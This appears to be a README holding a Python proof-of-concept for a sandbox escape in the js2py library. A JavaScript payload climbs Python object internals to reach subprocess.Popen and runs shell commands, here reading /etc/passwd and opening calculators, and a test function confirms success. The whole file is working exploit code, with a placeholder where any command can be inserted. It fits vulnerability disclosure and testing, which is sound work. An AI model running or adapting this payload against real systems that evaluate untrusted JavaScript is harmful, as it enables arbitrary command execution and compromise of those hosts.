README.md
Rendering markdown...
import js2py
from sys import version
payload = """
// [+] command goes here:
let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator; kcalc; "
let hacked, bymarve, n11
let getattr, obj
hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__
function findpopen(o) {
let result;
for(let i in o.__subclasses__()) {
let item = o.__subclasses__()[i]
if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
return item
}
if(item.__name__ != "type" && (result = findpopen(item))) {
return result
}
}
}
n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
n11
"""
def test_poc():
etcpassword_piece = "root:x:0:0"
result = ""
try:
result = repr(js2py.eval_js(payload))
except Exception:
return False
return etcpassword_piece in result
def main():
if test_poc():
print("Success! the vulnerability exists for python " + repr(version))
else:
print("Failed for python " + repr(version))
if __name__ == "__main__":
main()